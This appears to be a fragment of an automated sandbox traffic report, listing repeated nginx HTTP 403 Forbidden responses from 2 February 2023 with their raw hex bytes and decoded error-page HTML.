            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:12 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:12 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:19:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
